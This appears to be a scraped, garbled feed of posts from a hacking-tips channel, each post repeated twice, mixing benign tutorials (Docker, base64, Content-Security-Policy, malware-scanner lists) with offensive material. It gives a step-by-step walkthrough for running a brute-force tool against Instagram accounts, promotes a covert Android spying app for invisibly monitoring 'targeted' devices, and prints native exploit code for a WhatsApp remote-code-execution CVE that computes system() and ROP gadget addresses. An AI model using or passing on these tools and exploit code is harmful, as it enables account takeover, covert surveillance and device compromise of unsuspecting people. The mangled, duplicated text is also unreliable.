β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦So is the SMS verification code really safe?
1) If it is safe, nothing is really safe, and SMS verification code is not the safest way to verify your identity. The reason why identity verification through SMS can grow wildly within a few years is that it is the lowest cost, easiest and most convenient verification method for secondary verification through SMS.
2) Another reason is that the popularity of mobile phones is also the easiest to be widely used by users. Accept, and the security level of SMS verification is relatively high.
3) Relatively speaking, the security of the secondary identity verification by SMS is relatively high. The difference is that due to the popularity of smart phones, the loopholes in the mobile phone system are also increasing, and the existence of various Trojan horses has led to the emergence of the security of identity verification by SMS. problem. But at present it is still a relatively safe verification method.
π¦What kind of threats are mobile SMS verification facing? What kind of response?
1) Since it is the era of smart phones, the biggest threat to mobile phone SMS verification is from SMS Trojans on smart platforms. This type of SMS Trojan horse sends short connection SMS to allow users to download and install the Trojan without their knowledge. When the Trojan horse is installed in the mobile phone, it will reset the userβs property-related application account password and intercept the SMS verification code. Reset the user's account.
2) This is a threat to the userβs SMS verification security, but because of the simplicity of writing, such Trojans have already formed a very complete industry chain. Make Trojans β sell Trojans β rent Trojans β conduct phishing scams β wash after success No. β Transfer of property . This is a huge industrial chain located underground, and because it has derived a series of industries,
3) I won't say much here. Of course, smart platforms have also issued corresponding policies to reduce the incidence of such thefts. For example, after the Android system version 4.4 has tightened the permissions for SMS, most of them still rely on users to increase their vigilance to prevent
don't clone our tutorials
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦So is the SMS verification code really safe?
1) If it is safe, nothing is really safe, and SMS verification code is not the safest way to verify your identity. The reason why identity verification through SMS can grow wildly within a few years is that it is the lowest cost, easiest and most convenient verification method for secondary verification through SMS.
2) Another reason is that the popularity of mobile phones is also the easiest to be widely used by users. Accept, and the security level of SMS verification is relatively high.
3) Relatively speaking, the security of the secondary identity verification by SMS is relatively high. The difference is that due to the popularity of smart phones, the loopholes in the mobile phone system are also increasing, and the existence of various Trojan horses has led to the emergence of the security of identity verification by SMS. problem. But at present it is still a relatively safe verification method.
π¦What kind of threats are mobile SMS verification facing? What kind of response?
1) Since it is the era of smart phones, the biggest threat to mobile phone SMS verification is from SMS Trojans on smart platforms. This type of SMS Trojan horse sends short connection SMS to allow users to download and install the Trojan without their knowledge. When the Trojan horse is installed in the mobile phone, it will reset the userβs property-related application account password and intercept the SMS verification code. Reset the user's account.
2) This is a threat to the userβs SMS verification security, but because of the simplicity of writing, such Trojans have already formed a very complete industry chain. Make Trojans β sell Trojans β rent Trojans β conduct phishing scams β wash after success No. β Transfer of property . This is a huge industrial chain located underground, and because it has derived a series of industries,
3) I won't say much here. Of course, smart platforms have also issued corresponding policies to reduce the incidence of such thefts. For example, after the Android system version 4.4 has tightened the permissions for SMS, most of them still rely on users to increase their vigilance to prevent
don't clone our tutorials
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦USA NUMBERS FOR SOCIAL MEDIA APPS :
UPDATED LIST
1) https://www.ring4.com/en/
2) https://www.numeroesim.com/
3) https://www.openphone.co/
4) https://talkroute.com/mobile-apps-ios-android/
5) https://www.vonage.com/personal/vonage-mobile-app?
6) https://sonetel.com/en/
7) https://www.virtualphone.com/
8) https://www.worldsim.com/virtual-phone-number?___store=usa
9) http://www.telosapp.com/
10) https://www.cloudsimapp.com/
11) https://www.line2.com/
12) https://www.burnerapp.com/ (GOOD FOR WHATSAPP)
13) https://apkpure.com/usa-free-number/com.usa.free.nu
14) https://2ndline-second-phone-number.en.softonic.com/android
don't clone our tutorials
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦USA NUMBERS FOR SOCIAL MEDIA APPS :
UPDATED LIST
1) https://www.ring4.com/en/
2) https://www.numeroesim.com/
3) https://www.openphone.co/
4) https://talkroute.com/mobile-apps-ios-android/
5) https://www.vonage.com/personal/vonage-mobile-app?
6) https://sonetel.com/en/
7) https://www.virtualphone.com/
8) https://www.worldsim.com/virtual-phone-number?___store=usa
9) http://www.telosapp.com/
10) https://www.cloudsimapp.com/
11) https://www.line2.com/
12) https://www.burnerapp.com/ (GOOD FOR WHATSAPP)
13) https://apkpure.com/usa-free-number/com.usa.free.nu
14) https://2ndline-second-phone-number.en.softonic.com/android
don't clone our tutorials
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Docker for beginers :
Docker is the world's leading software containerization platform. For different types of penetration testing , we can use Docker to create corresponding environments. With Docker containers, you can put the test environment on a USB flash drive or the cloud.
Β»What is Docker
1) Docker is an open source technology. In software containers, you can create, run, test, and deploy applications. Dcoker allows you to deploy applications quickly, reliably, and stably in any environment.
2) The container has the advantages of being portable, convenient and fast. Using Docker, we can create an image, and then create other environments on the basis of this image. For example, we downloaded Kali Linux as a basic container, but it didn't install the tools we need. We regard it as a basic container, install the required tools on it, and then save it as a new image without affecting the original image.
3) In other words, based on the original image, a container containing forensic tools and Web penetration testing tools can be created.
π¦Tools for web penetration testing
W3af-console
SQLMap
Arachni
Nikto
Websploit
Nmap
π¦About installation
The installation of Docker depends on the operating system you are using, but now we can find installation packages for most systems in the official warehouse.
example we use the OpenSuse system.
_0x4a0x72@pwned ~ sudo zypper se docker
S | Nome | Resumo | Tipo
β+ββββββββββ+βββββββββββββββββββββ+ββββ-
| docker | The Linux container runtime | pacote
_0x4a0x72@pwned ~ sudo zypper in docker
After the installation is successful, you must enable and start the service
_0x4a0x72@pwned ~ sudo systemctl enable docker
_0x4a0x72@pwned ~ sudo systemctl start docker
_0x4a0x72@pwned ~ sudo docker info
don't clone our tutorials
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Docker for beginers :
Docker is the world's leading software containerization platform. For different types of penetration testing , we can use Docker to create corresponding environments. With Docker containers, you can put the test environment on a USB flash drive or the cloud.
Β»What is Docker
1) Docker is an open source technology. In software containers, you can create, run, test, and deploy applications. Dcoker allows you to deploy applications quickly, reliably, and stably in any environment.
2) The container has the advantages of being portable, convenient and fast. Using Docker, we can create an image, and then create other environments on the basis of this image. For example, we downloaded Kali Linux as a basic container, but it didn't install the tools we need. We regard it as a basic container, install the required tools on it, and then save it as a new image without affecting the original image.
3) In other words, based on the original image, a container containing forensic tools and Web penetration testing tools can be created.
π¦Tools for web penetration testing
W3af-console
SQLMap
Arachni
Nikto
Websploit
Nmap
π¦About installation
The installation of Docker depends on the operating system you are using, but now we can find installation packages for most systems in the official warehouse.
example we use the OpenSuse system.
_0x4a0x72@pwned ~ sudo zypper se docker
S | Nome | Resumo | Tipo
β+ββββββββββ+βββββββββββββββββββββ+ββββ-
| docker | The Linux container runtime | pacote
_0x4a0x72@pwned ~ sudo zypper in docker
After the installation is successful, you must enable and start the service
_0x4a0x72@pwned ~ sudo systemctl enable docker
_0x4a0x72@pwned ~ sudo systemctl start docker
_0x4a0x72@pwned ~ sudo docker info
don't clone our tutorials
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Base64 Encode and Decode From Command Line :
how to use the base64 command to encode and decode the data in a string or a file ?
example We have performed the commands on Ubuntu 20.04 Focal Fossa system. However, you can also run the same commands on other Linux distributions. For running the commands, we have used the command line Terminal application, which can be accessed using the Ctrl+Alt+T keyboard shortcut.
A) Base64 Syntax
1) Here is the syntax for encoding using Base64:
base64 [OPTION] [FILE]
Options
Some of the command-line options that can be used with base64 command are:
-d or --decode
2) Use this option to decode a file or a string.
--help
Use this option to display help regarding the usage of base64.
-i, --ignore-garbage
Use this option while decoding to ignore non-alphabet characters
--version
Use this option to display version information
B) Encoding String
You can easily encode a string using the base64 command. For instance, to encode a sample text βWelcome to Linuxβ to base64, the command would be:
$ echo βWelcome to Linuxβ | base64
1) This command will encode the text in the string using base64 and print the encoded text to standard output
2) You can also save the encoded output to a file rather than printing to standard output using the redirection operator (>). The following command will encode the text and save the output to a file named βencodedfile.txt:
$ echo βWelcome to Linuxβ | base64 > encodedfile.txt
3) To view the encoded file, you can use the cat command:
$ cat encodedfile.txt
C) Decoding String
1) You can also decode the base64 encoded text using the βdecode or -d option. For instance to decode base64 encoded text βV2VsY29tZSB0byBMaW51eAo=β, the command would be:
$ echo βV2VsY29tZSB0byBMaW51eAo=β | base64 --decode
2) This command will decode the base64 encoded text and print the original text on the standard outpuT
3) You can also save the decoded output to a file rather than printing to standard output using the redirection operator (>). The following command will decode the encoded text and save the original text to a file named βdecodedfile.txt:
$ echo βV2VsY29tZSB0byBMaW51eAo=β | base64 βdecode > decodedfile.txt
E) Encoding Text File
The base64 command can also be used to encode a text file. For instance, to encode a text file named βtestfile.txtβ, the command would be:
$ base64 testfile.txt
unix forum
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Base64 Encode and Decode From Command Line :
how to use the base64 command to encode and decode the data in a string or a file ?
example We have performed the commands on Ubuntu 20.04 Focal Fossa system. However, you can also run the same commands on other Linux distributions. For running the commands, we have used the command line Terminal application, which can be accessed using the Ctrl+Alt+T keyboard shortcut.
A) Base64 Syntax
1) Here is the syntax for encoding using Base64:
base64 [OPTION] [FILE]
Options
Some of the command-line options that can be used with base64 command are:
-d or --decode
2) Use this option to decode a file or a string.
--help
Use this option to display help regarding the usage of base64.
-i, --ignore-garbage
Use this option while decoding to ignore non-alphabet characters
--version
Use this option to display version information
B) Encoding String
You can easily encode a string using the base64 command. For instance, to encode a sample text βWelcome to Linuxβ to base64, the command would be:
$ echo βWelcome to Linuxβ | base64
1) This command will encode the text in the string using base64 and print the encoded text to standard output
2) You can also save the encoded output to a file rather than printing to standard output using the redirection operator (>). The following command will encode the text and save the output to a file named βencodedfile.txt:
$ echo βWelcome to Linuxβ | base64 > encodedfile.txt
3) To view the encoded file, you can use the cat command:
$ cat encodedfile.txt
C) Decoding String
1) You can also decode the base64 encoded text using the βdecode or -d option. For instance to decode base64 encoded text βV2VsY29tZSB0byBMaW51eAo=β, the command would be:
$ echo βV2VsY29tZSB0byBMaW51eAo=β | base64 --decode
2) This command will decode the base64 encoded text and print the original text on the standard outpuT
3) You can also save the decoded output to a file rather than printing to standard output using the redirection operator (>). The following command will decode the encoded text and save the original text to a file named βdecodedfile.txt:
$ echo βV2VsY29tZSB0byBMaW51eAo=β | base64 βdecode > decodedfile.txt
E) Encoding Text File
The base64 command can also be used to encode a text file. For instance, to encode a text file named βtestfile.txtβ, the command would be:
$ base64 testfile.txt
unix forum
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Hack instagram via linux :
π»π΄π 'π π π π°π π :
1) git clone https://github.com/Ethical-H4CK3R/Instagram.git
this command will clone the entire program/script to your computer.
2) and now you need to chmod the file and open (go to) the directory of the program.
Type
> chmod -R 755 Instagram && cd Instagram
3) Now that we cloned the program/script, we now need to open the program.
> Type :
"ls"
to see what is inside the folder.
4) Now, as we know that there are three things inside the program/script folder, "Core", "README.md" and "instagram.py".
5) The executable program here is "instagram.py".
We need to execute the program. So type:
python instagram.py
6) For setup proxies https://www.serverlab.ca/tutorials/linux/administration-linux/how-to-configure-proxy-on-ubuntu-18-04/
7) for setup worldlist
https://www.youtube.com/watch?v=GUNA0THt4a4
don't clone our tutorials
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Hack instagram via linux :
π»π΄π 'π π π π°π π :
1) git clone https://github.com/Ethical-H4CK3R/Instagram.git
this command will clone the entire program/script to your computer.
2) and now you need to chmod the file and open (go to) the directory of the program.
Type
> chmod -R 755 Instagram && cd Instagram
3) Now that we cloned the program/script, we now need to open the program.
> Type :
"ls"
to see what is inside the folder.
4) Now, as we know that there are three things inside the program/script folder, "Core", "README.md" and "instagram.py".
5) The executable program here is "instagram.py".
We need to execute the program. So type:
python instagram.py
6) For setup proxies https://www.serverlab.ca/tutorials/linux/administration-linux/how-to-configure-proxy-on-ubuntu-18-04/
7) for setup worldlist
https://www.youtube.com/watch?v=GUNA0THt4a4
don't clone our tutorials
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - Bitwise-01/Instagram-: Bruteforce attack for Instagram.
Bruteforce attack for Instagram. . Contribute to Bitwise-01/Instagram- development by creating an account on GitHub.
π¦FREE ANDROID SPYING APPLICATION :
Remote access to the complete database of the targeted device with full invisibility on targeted devices.
Remote access the LIVE SCREEN SHARING OF TARGETED DEVICE
Remotely access to WEB HISTORY(in processing)
Remotely MONITORING MULTIPLE DEVICES AT A TIME WITH
BETTER CONSOLE
REALTIME WEB CONSOLE FOR MONITORING AND CONTROLLING
BETTER UX/UI DESIGN EXPERIENCE
Β» https://github.com/ranaaditya/SPYZIER-APP
(open source)
β β β Uππ»βΊπ«Δπ¬πβ β β β
Remote access to the complete database of the targeted device with full invisibility on targeted devices.
Remote access the LIVE SCREEN SHARING OF TARGETED DEVICE
Remotely access to WEB HISTORY(in processing)
Remotely MONITORING MULTIPLE DEVICES AT A TIME WITH
BETTER CONSOLE
REALTIME WEB CONSOLE FOR MONITORING AND CONTROLLING
BETTER UX/UI DESIGN EXPERIENCE
Β» https://github.com/ranaaditya/SPYZIER-APP
(open source)
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - ranaaditya/SPYZIER-APP: Android spying app and Parental controller app.
Android spying app and Parental controller app. Contribute to ranaaditya/SPYZIER-APP development by creating an account on GitHub.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Create your own antivirus-malware detection tools & tutorials :
* [File Scanning Framework](https://github.com/EmersonElectricCo/fsf) -
Modular, recursive file scanning solution.
* [Generic File Parser](https://github.com/uppusaikiran/generic-parser) - A Single Library Parser to extract meta information,static analysis and detect macros within the files.
* [hashdeep](https://github.com/jessek/hashdeep) - Compute digest hashes with
a variety of algorithms.
* [HashCheck](https://github.com/gurnec/HashCheck) - Windows shell extension
to compute hashes with a variety of algorithms.
* [Loki](https://github.com/Neo23x0/Loki) - Host based scanner for IOCs.
* [Malfunction](https://github.com/Dynetics/Malfunction) - Catalog and
compare malware at a function level.
* [Manalyze](https://github.com/JusticeRage/Manalyze) - Static analyzer for PE
executables.
* [MASTIFF](https://github.com/KoreLogicSecurity/mastiff) - Static analysis
framework.
* [MultiScanner](https://github.com/mitre/multiscanner) - Modular file
scanning/analysis framework
don't clone our tutorials
git
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Create your own antivirus-malware detection tools & tutorials :
* [File Scanning Framework](https://github.com/EmersonElectricCo/fsf) -
Modular, recursive file scanning solution.
* [Generic File Parser](https://github.com/uppusaikiran/generic-parser) - A Single Library Parser to extract meta information,static analysis and detect macros within the files.
* [hashdeep](https://github.com/jessek/hashdeep) - Compute digest hashes with
a variety of algorithms.
* [HashCheck](https://github.com/gurnec/HashCheck) - Windows shell extension
to compute hashes with a variety of algorithms.
* [Loki](https://github.com/Neo23x0/Loki) - Host based scanner for IOCs.
* [Malfunction](https://github.com/Dynetics/Malfunction) - Catalog and
compare malware at a function level.
* [Manalyze](https://github.com/JusticeRage/Manalyze) - Static analyzer for PE
executables.
* [MASTIFF](https://github.com/KoreLogicSecurity/mastiff) - Static analysis
framework.
* [MultiScanner](https://github.com/mitre/multiscanner) - Modular file
scanning/analysis framework
don't clone our tutorials
git
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - EmersonElectricCo/fsf: File Scanning Framework
File Scanning Framework. Contribute to EmersonElectricCo/fsf development by creating an account on GitHub.
WARNING! we receive many reports, some bad guys, use our profiles, names ! pictures or logos for a while & chatting peopleβs talking with Impersonation.
For chatting with undercode for support or help, dm admins in groups or go to social media only, or emails
Support@UndercodeTesting.com
Support@UndercodeNews.com
and thanks you.
For chatting with undercode for support or help, dm admins in groups or go to social media only, or emails
Support@UndercodeTesting.com
Support@UndercodeNews.com
and thanks you.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦The real lastest Whatsapp cve :
Finally uploaded
# Exploit Title: Whatsapp 2.19.216 - Remote Code Execution
# Date: 2019-10-16
# Exploit Author: Valerio Brussani (@val_brux)
# Vendor Homepage: https://www.whatsapp.com/
# Version: < 2.19.244
# Tested on: Whatsapp 2.19.216
# CVE: CVE-2019-11932
# Reference1: https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/
# Full Android App: https://github.com/valbrux/CVE-2019-11932-SupportApp
# Credits: all credits for the bug discovery goes to Awakened (https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/)
/*
*
* Introduction
* This native code file aims to be complementary to the published Whatsapp GIF RCE exploit by Awakened , by calculating the system() function address and ROP gadget address for different types of devices, which then can be used to successfully exploit the vulnerability.
* The full Android application code is available at the following link https://github.com/valbrux/CVE-2019-11932-SupportApp
*
*/
#include <jni.h>
#include <string>
#include <dlfcn.h>
#include <link.h>
typedef uint8_t byte;
char *gadget_p;
void* libc,* lib;
//dls iteration for rop
int dl_callback(struct dl_phdr_info *info, size_t size, void *data)
{
int j;
const char *base = (const char *)info->dlpi_addr;
for (j = 0; j < info->dlpi_phnum; j++) {
const ElfW(Phdr) *phdr = &info->dlpi_phdr[j];
if (phdr->p_type == PT_LOAD && (strcmp("/system/lib64/libhwui.so",info->dlpi_name) == 0)) {
gadget_p = (char *) base + phdr->p_vaddr;
return 1;
}
}
return 0;
}
//system address
void* get_system_address(){
libc = dlopen("libc.so",RTLD_GLOBAL);
void* address = dlsym( libc, "system");
return address;
}
//rop gadget address
void get_gadget_lib_base_address() {
lib = dlopen("libhwui.so",RTLD_GLOBAL);
dl_iterate_phdr(dl_callback, NULL);
}
//search gadget
long search_for_gadget_offset() {
char *buffer;
long filelen;
char curChar;
long pos = 0; int curSearch = 0;
//reading file
FILE* fd = fopen("/system/lib64/libhwui.so","rb");
fseek(fd, 0, SEEK_END);
filelen = ftell(fd);
rewind(fd);
buffer = (char *)malloc((filelen+1)*sizeof(char));
fread(buffer, filelen, 1, fd);
fclose(fd);
//searching for bytes
byte g1[12] = {0x68, 0x0E, 0x40, 0xF9, 0x60, 0x82, 0x00, 0x91, 0x00, 0x01, 0x3F, 0xD6};
while(pos <= filelen){
curChar = buffer[pos];pos++;
if(curChar == g1[curSearch]){
curSearch++;
if(curSearch > 11){
curSearch = 0;
pos-=12;
break;
}
}
else{
curSearch = 0;
}
}
return pos;
}
extern "C" JNIEXPORT jstring JNICALL Java_com_valbrux_myapplication_MainActivity_getSystem(JNIEnv* env,jobject) {
char buff[30];
//system address
snprintf(buff, sizeof(buff), "%p", get_system_address());
dlclose(libc);
std::string system_string = buff;
return env->NewStringUTF(system_string.c_str());
}
extern "C" JNIEXPORT jstring JNICALL Java_com_valbrux_myapplication_MainActivity_getROPGadget(JNIEnv* env,jobject) {
char buff[30];
get_gadget_lib_base_address();
//gadget address
snprintf(buff, sizeof(buff), "%p",gadget_p+search_for_gadget_offset());
dlclose(lib);
std::string system_string = buff;
return env->NewStringUTF(system_string.c_str());
}
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦The real lastest Whatsapp cve :
Finally uploaded
# Exploit Title: Whatsapp 2.19.216 - Remote Code Execution
# Date: 2019-10-16
# Exploit Author: Valerio Brussani (@val_brux)
# Vendor Homepage: https://www.whatsapp.com/
# Version: < 2.19.244
# Tested on: Whatsapp 2.19.216
# CVE: CVE-2019-11932
# Reference1: https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/
# Full Android App: https://github.com/valbrux/CVE-2019-11932-SupportApp
# Credits: all credits for the bug discovery goes to Awakened (https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/)
/*
*
* Introduction
* This native code file aims to be complementary to the published Whatsapp GIF RCE exploit by Awakened , by calculating the system() function address and ROP gadget address for different types of devices, which then can be used to successfully exploit the vulnerability.
* The full Android application code is available at the following link https://github.com/valbrux/CVE-2019-11932-SupportApp
*
*/
#include <jni.h>
#include <string>
#include <dlfcn.h>
#include <link.h>
typedef uint8_t byte;
char *gadget_p;
void* libc,* lib;
//dls iteration for rop
int dl_callback(struct dl_phdr_info *info, size_t size, void *data)
{
int j;
const char *base = (const char *)info->dlpi_addr;
for (j = 0; j < info->dlpi_phnum; j++) {
const ElfW(Phdr) *phdr = &info->dlpi_phdr[j];
if (phdr->p_type == PT_LOAD && (strcmp("/system/lib64/libhwui.so",info->dlpi_name) == 0)) {
gadget_p = (char *) base + phdr->p_vaddr;
return 1;
}
}
return 0;
}
//system address
void* get_system_address(){
libc = dlopen("libc.so",RTLD_GLOBAL);
void* address = dlsym( libc, "system");
return address;
}
//rop gadget address
void get_gadget_lib_base_address() {
lib = dlopen("libhwui.so",RTLD_GLOBAL);
dl_iterate_phdr(dl_callback, NULL);
}
//search gadget
long search_for_gadget_offset() {
char *buffer;
long filelen;
char curChar;
long pos = 0; int curSearch = 0;
//reading file
FILE* fd = fopen("/system/lib64/libhwui.so","rb");
fseek(fd, 0, SEEK_END);
filelen = ftell(fd);
rewind(fd);
buffer = (char *)malloc((filelen+1)*sizeof(char));
fread(buffer, filelen, 1, fd);
fclose(fd);
//searching for bytes
byte g1[12] = {0x68, 0x0E, 0x40, 0xF9, 0x60, 0x82, 0x00, 0x91, 0x00, 0x01, 0x3F, 0xD6};
while(pos <= filelen){
curChar = buffer[pos];pos++;
if(curChar == g1[curSearch]){
curSearch++;
if(curSearch > 11){
curSearch = 0;
pos-=12;
break;
}
}
else{
curSearch = 0;
}
}
return pos;
}
extern "C" JNIEXPORT jstring JNICALL Java_com_valbrux_myapplication_MainActivity_getSystem(JNIEnv* env,jobject) {
char buff[30];
//system address
snprintf(buff, sizeof(buff), "%p", get_system_address());
dlclose(libc);
std::string system_string = buff;
return env->NewStringUTF(system_string.c_str());
}
extern "C" JNIEXPORT jstring JNICALL Java_com_valbrux_myapplication_MainActivity_getROPGadget(JNIEnv* env,jobject) {
char buff[30];
get_gadget_lib_base_address();
//gadget address
snprintf(buff, sizeof(buff), "%p",gadget_p+search_for_gadget_offset());
dlclose(lib);
std::string system_string = buff;
return env->NewStringUTF(system_string.c_str());
}
β β β Uππ»βΊπ«Δπ¬πβ β β β
WhatsApp.com
WhatsApp | Secure and Reliable Free Private Messaging and Calling
Use WhatsApp Messenger to stay in touch with friends and family. WhatsApp is free and offers simple, secure, reliable messaging and calling, available on phones all over the world.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦New tip :
The
You can simply list your sources after a directive as a space-separated list:
Everything below the specified parameters is implicitly allowed. That means that in the example above these would be valid sources:
The most common directives are:
There are others, but these are the ones you're most likely to need.
3. How can I use multiple directives?
You define all your directives inside one meta-tag by terminating them with a semicolon (
Everything but the default ports needs to be allowed explicitly by adding the port number or an asterisk after the allowed domain:
By default, only standard protocols are allowed. For example to allow WebSockets
If you'll try to define it as such it wonβt work. Instead, you'll allow it with the
Unless explicitly allowed, you can't use inline style definitions, code inside
I'm sure many people would say that you don't, since 'eval is evil' and the most likely cause for the impending end of the world. Those people would be wrong. Sure, you can definitely punch major holes into your site's security with eval, but it has perfectly valid use cases. You just have to be smart about using it. You allow it like so:
You might take
Unixforum
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦New tip :
The
Content-Security-Policy
1. How can I allow multiple sources?You can simply list your sources after a directive as a space-separated list:
content="default-src 'self' https://example.com/js/"
Note that there are no quotes around parameters other than the special ones, like 'self'. Also, there's no colon (:) after the directive. Just the directive, then a space-separated list of parameters.Everything below the specified parameters is implicitly allowed. That means that in the example above these would be valid sources:
https://example.com/js/file.js
https://example.com/js/subdir/anotherfile.js
These, however, would not be valid:http://example.com/js/file.js
^^^^ wrong protocol
https://example.com/file.js
^^ above the specified path
2. How can I use different directives? What do they each do?The most common directives are:
β’ default-src the default policy for loading javascript, images, CSS, fonts, AJAX requests, etc β’ script-src defines valid sources for javascript files β’ style-src defines valid sources for css files β’ img-src defines valid sources for images β’ connect-src defines valid targets for to XMLHttpRequest (AJAX), WebSockets or EventSource. If a connection attempt is made to a host that's not allowed here, the browser will emulate a 400 errorThere are others, but these are the ones you're most likely to need.
3. How can I use multiple directives?
You define all your directives inside one meta-tag by terminating them with a semicolon (
;):content="default-src 'self' https://example.com/js/; style-src 'self'"
4. How can I handle ports?Everything but the default ports needs to be allowed explicitly by adding the port number or an asterisk after the allowed domain:
content="default-src 'self' https://ajax.googleapis.com http://example.com:123/free/stuff/"
The above would result in:https://ajax.googleapis.com:123
^^^^ Not ok, wrong port
https://ajax.googleapis.com - OK
http://example.com/free/stuff/file.js
^^ Not ok, only the port 123 is allowed
http://example.com:123/free/stuff/file.js - OK
As I mentioned, you can also use an asterisk to explicitly allow all ports:content="default-src example.com:*"
5. How can I handle different protocols?By default, only standard protocols are allowed. For example to allow WebSockets
ws:// you will have to allow it explicitly:content="default-src 'self'; connect-src ws:; style-src 'self'"
^^^ web Sockets are now allowed on all domains and ports.
6. How can I allow the file protocol file://?If you'll try to define it as such it wonβt work. Instead, you'll allow it with the
filesystem parameter:content="default-src filesystem"
7. How can I use inline scripts and style definitions?Unless explicitly allowed, you can't use inline style definitions, code inside
<script> tags or in tag properties like onclick. You allow them like so:content="script-src 'unsafe-inline'; style-src 'unsafe-inline'"
You'll also have to explicitly allow inline, base64 encoded images:content="img-src data:"
8. How can I allow eval()?I'm sure many people would say that you don't, since 'eval is evil' and the most likely cause for the impending end of the world. Those people would be wrong. Sure, you can definitely punch major holes into your site's security with eval, but it has perfectly valid use cases. You just have to be smart about using it. You allow it like so:
content="script-src 'unsafe-eval'"
9. What exactly does 'self' mean?You might take
'self' to mean localhost, local filesystem, or anything on the same host. It doesn't mean any of those. It means sources that have the same scheme (protocol), same host, and same port as the file the content policy is defined in. Serving your site over HTTP? No https for you then, unless you define it explicitly.Unixforum
β β β Uππ»βΊπ«Δπ¬πβ β β β